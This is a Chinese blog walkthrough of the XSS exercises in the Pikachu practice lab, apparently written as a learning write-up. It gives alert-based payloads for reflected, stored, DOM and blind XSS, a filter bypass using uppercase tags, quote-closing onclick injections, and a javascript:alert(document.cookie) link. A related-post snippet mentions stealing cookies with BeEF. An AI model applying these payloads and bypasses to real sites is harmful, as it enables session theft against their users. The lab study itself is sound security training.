【Pikachu】Cross-Site Scripting

已于 2023-12-14 12:40:17 修改
阅读量318 收藏
点赞数 2
分类专栏: # 靶场系列 文章标签: pikachu
于 2023-08-18 08:54:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/132354216
版权

文章目录

image-20230815221214655

反射型xss(get)

image-20230812143856462

<script>alert("123")</script>

修改maxlength的值

image-20230812143947435

image-20230812143956083

反射型xss(post)

账号admin密码123456直接登录

<script>alert('xss')</script>

image-20230812150211238

image-20230812150216602

存储型xss

在留言板里直接<script>alert('xss')</script>

image-20230812150255251

出现xss的弹框后,点击确定,发现有个删除,说明确实是存到数据库里了

image-20230812150403215

查看数据库又没有这一条数据

image-20230812150651668

再次在留言板里输入js代码<script>alert('zs6666')</script>

image-20230812150736541

再次查看数据库

image-20230812150749514

这就是存储型反射型永久性和一次性的区别,会永久的存储在数据库中。

DOM型xss

javascript语言中分两种BOMDOM

BOM:浏览器对象模型 Brower Object Model
	js代码操作浏览器
DOM:文档对象模型  Document Object Model
	js代码操作标签

查看网页源代码,ctrl+f查找what do you see? 的位置

image-20230812151517365

发现源码中已经给出了xss代码

输入框中的内容就是标注的str,我们可以在这里构造一个闭合,实现弹窗

<a href='"+str+"'>what do you see?</a>

在输入框中输入' onclick="alert('xss')">,点击click me,出现what do you see?点击

image-20230812151847732

DOM型xss-x

image-20230812152427993

输入框里输入1,发现url发生了变化

image-20230812152449376

这次是从url中获取我们输入的text参数的,这就类似反射型,构造闭合即可。' onclick="alert('xss')">

image-20230812152721741

xss-盲打

将留言保存至后台 当管理员登录查看留言时就会触发

在页面中两个输入框中都输入<script>alert("123")</script>,提交后没有反应

查看数据库:

image-20230812153056263

也可以点一下提示,让去后台看看

http://127.0.0.1/pikachu/vul/xss/xssblind/admin.php

image-20230812153122947

发现登录后台,就会弹框

image-20230812154100666

xss-过滤

不知道过滤了什么 双写,提交后没反应

<sc<script>ript>alert("123")</script>

换成大写后成功

<SCRIPT>alert('xss')</SCRIPT>

xss之htmlspecialchars

specialchars函数就是把单引号,双引号,尖括号过滤了,但是这个函数默认是不过滤单引号的

javascript:alert(1)

xss之href输出

href 属性的值可以是任何有效文档的相对或绝对 URL,包括片段标识符和 JavaScript 代码段。如果用户选择了<a>标签中的内容,那么浏览器会尝试检索并显示 href 属性指定的 URL 所表示的文档,或者执行 JavaScript 表达式、方法和函数的列表。

javascript:alert(document.cookie)
javascript:alert(1)

xss之js输出

image-20230812161216819

先输入tmac

在这里插入图片描述

可以提前闭合</script>

</script><script>alert(1)</script>

也可以' ; alert(1); //

页面接受到的就是$ms=''; alert(1);//'

第一步: $ms=‘’’

第二步: $ms=‘’;’ 加分号,表示语句结束

第三步: $ms=‘’; alert(1);’ 弹框

第四步: $ms=‘’; alert(1); //’ 把//后面的那对引号 注释掉

过期的秋刀鱼-
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
二、pikachu Cross-Site Scripting
山兔的博客
09-17 342
二、Cross-Site Scripting 1.XSS(跨站脚本)概述 XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。直接盗取到了用户的权限,然后实施破坏。 处理方式: 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入; 输出转义:根据输出点的位置对输出到前端的内容进行适当转义; <script>alert(/xss/)</script> 2.反射型xss(get) 好像限制了能输入
Pikachu-----Cross-Site Scripting(XSS)
m0_65712192的博客
12-17 922
Pikachu-----Cross-Site Scripting(XSS)
Pikachu(皮卡丘)靶场---Cross-Site Scripting
m0_74850066的博客
06-04 403
跨站脚本攻击(Cross-site scripting,XSS)是一种安全漏洞,攻击者可以利用这种漏洞在网站上注入恶意的客户端代码。若受害者运行这些恶意代码,攻击者就可以突破网站的访问限制并冒充受害者。根据开放式 Web 应用安全项目(OWASP),XSS 在 2017 年被认为7 种最常见的 Web 应用程序漏洞之一如果 Web 应用程序没有部署足够的安全验证,那么,这些攻击很容易成功。
pikachu之Cross-Site-Scripting
Alsn86的博客
11-23 3952
pikachu之Cross-Site-Scripting 反射型xss(get) 抓包情况 使用123</p><script>alert(666)</script>可以完成闭合 由于输入框的输入长度有限制,所以修改为100,或者直接在get参数里输入也可以 弹窗 反射性xss(post) 先用admin/123456登陆一下系统,为了获得cookie,如果想要尝试,可以在xss完成后插入beef的恶意代码来获取cookie 抓包查看 使用123</p&
pikachu靶场】跨站脚本攻击详细教程Cross-Site Scripting(xss)
weixin_60838266的博客
07-31 976
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
pikachu(皮卡丘)--Cross-Site Scripting
m0_74871683的博客
09-15 167
反射型XSS将用户输入的内容作为代码让浏览器执行达到攻击目的,一般需要让用户访问攻击者构造的URL。这种类型的攻击只发生在客户端上,并且需要从带有恶意脚本参数的特定URL进入,所以也称为非持久型XSS。交互的数据一般不会被存在在数据库里面,一次性,所见即所得,一般出现在查询类页面等。
pikachu XSS Cross-Site Scripting(皮卡丘漏洞平台通关系列)
箭雨镜屋
03-28 7865
第一关 反射型xss(get) 1、通关步骤
Pikachu靶场-Cross-Site Scripting
天行健,君子以自强不息
12-28 436
文笔生疏,措辞浅薄,望各位大佬不吝赐教,感激不尽。
pikachu—Cross-Site Scripting(XSS)
Cwillchris的博客
10-31 331
实验步骤: 一、反射型XSS(get) 多次输入,发现输入什么内容,提示都会出现输入内容 输入 <script>alert(1) ,提示whois,说名语句被执行了,没有显示,但是长度受限制,那我们就改一下长度 按F12打开控制台,选择HTML-编辑,右侧搜索length,搜到把长度值改为100 输入 <script>alert(1) </script> ,成功执行JS代码 二、反射型XSS(post) 正常输入,
Pikachu靶场——XSS漏洞(Cross-Site Scripting)
来日可期的博客
10-07 1324
跨站点脚本(Cross Site Scripting,XSS)是指客户端代码注入攻击,攻击者可以在合法网站或Web应用程序中执行恶意脚本。当wb应用程序在其生成的输出中使用未经验证或未编码的用户输入时,就会发生XSS。
Cross-Site Scripting-跨站脚本攻击
田田云逸的博客
04-28 593
#' onclick=alert('jwt') '</a>闭合后:<a href="#" onclick="alert(1399)">#' onclick='alert(1399)
pikachu靶场之Cross-Site Scripting(XSS)
Christma1s的博客
03-06 546
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; ...
XSS基础原理(Cross-site scripting)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-13 1571
XSS基础原理(Cross-site scripting) 文章目录XSS基础原理(Cross-site scripting)什么是跨站脚本 (XSS)?XSS 攻击主要分为三种类反射型 XSS,其中恶意脚本来自当前的 HTTP 请求案例 1 大小写,双写绕过 dvwa_Medium案例 2 各种标签绕过 dvwa_high案例 3 htmlspecialchars pikachu_htmlspecialchars存储的 XSS,其中恶意脚本来自网站的数据库案例 1 replace()函数对尖括
pikachu---XSS漏洞
m0_52822871的博客
08-31 613
实验环境–pikachu靶机 (记录学习笔记) 一 XSS概述 1.XSS定义 •人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 •跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 2.XSS原理
pikachu-XSS(跨站脚本攻击)
a1245678899的博客
11-09 1147
XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容 被当成正常的HTML来执行(类似于SQL注入),从而产生危害。造成DOM型XSS的原因是前端的输入被DOM给获取到了,通过DOM又在前端输出,跟反射型和存储型比起来,它是不经过后台交互的。存储型XSS和反射型XSS形成的原因是一样的,不同的是存储型XSS下攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害。编码,后台过滤了特殊字符,比如标签,但该标签可以被各种编码,后台不一定过。
HTML5宠爱有家网站模板.zip
09-06
页面数量:1页 网页主题:宠物网站模板、产品介绍、官网模板、网站模板 网页页面:首页、关于我们、相关服务、团队介绍、宠物博客、宠物照片墙、在线留言 页面实现元素:导航 、轮播图、图文列表、图片遮罩层、图片切换、 按钮悬停、图片列表、图片悬停、文字列表、表单、底部快速导航、回到顶部 实现技术:HTML、CSS 、JQuery
LM324设计的LED电平指示器电路图技术资料开发设计用的重要资料.zip
最新发布
09-06
LM324设计的LED电平指示器电路图技术资料开发设计用的重要资料.zip
springboot游戏分享网站
09-06
网络的广泛应用给生活带来了十分的便利。所以把游戏分享管理与现在网络相结合,利用java技术建设游戏分享网站,实现游戏分享的信息化。则对于进一步提高游戏分享管理发展,丰富游戏分享管理经验能起到不少的促进作用。 游戏分享网站能够通过互联网得到广泛的、全面的宣传,让尽可能多的用户了解和熟知游戏分享网站的便捷高效,不仅为群众提供了服务,而且也推广了自己,让更多的群众了解自己。对于游戏分享而言,若拥有自己的系统,通过系统得到更好的管理,同时提升了形象。 本系统设计的现状和趋势,从需求、结构、数据库等方面的设计到系统的实现,分别为管理员和用户的实现。论文的内容从系统的设计、描述、实现、分析、测试方面来表明开发的过程。本系统根据现实情况来选择一种可行的开发方案,借助java编程语言和MySQL数据库等实现系统的全部功能,接下来对系统进行测试,测试系统是否有漏洞和测试用户权限来完善系统,最终系统完成达到相关标准。
8051Proteus仿真c源码位定义的输入输出控制
09-06
8051Proteus仿真c源码位定义的输入输出控制提取方式是百度网盘分享地址
pikachu-master
08-16
pikachu-master是一个带有漏洞的Web应用系统,可以用于进行web安全漏洞的练习和学习。你可以从GitHub上下载pikachu-master的源码,并将其上传到你的Web服务器的根目录下。然后,你可以通过访问服务器的IP地址加上pikachu-master的路径来访问这个靶场,例如http://192.168.132.131/pikachu-master/。在安装和配置pikachu-master时,你需要确保Apache和MySQL服务开启,并将pikachu-master文件夹放置在xampp安装目录的htdocs文件夹下,并将config.inc.php文件中的数据库连接信息修改为你实际的数据库连接信息。在安装和配置完成后,你可以通过127.0.0.1/pikachu-master路径来访问这个靶场。在访问之前,你可以通过phpmyadmin来修改数据库账号和密码。请注意,解压pikachu-master文件时会生成两个文件夹,所以路径是127.0.0.1/pikachu-master/pikachu-master。pikachu-master提供了综合类型的靶场练习环境,涵盖了多种漏洞,适合进一步加强你的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Linux--linux部署pikachu靶场-kali-部署靶场(详细讲解)](https://blog.csdn.net/qq_56664029/article/details/129888616)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [pikachu实验靶场环境部署](https://blog.csdn.net/qq_40731934/article/details/130676513)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [pikachu-master.zip](https://download.csdn.net/download/BROTHERYY/12550852)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值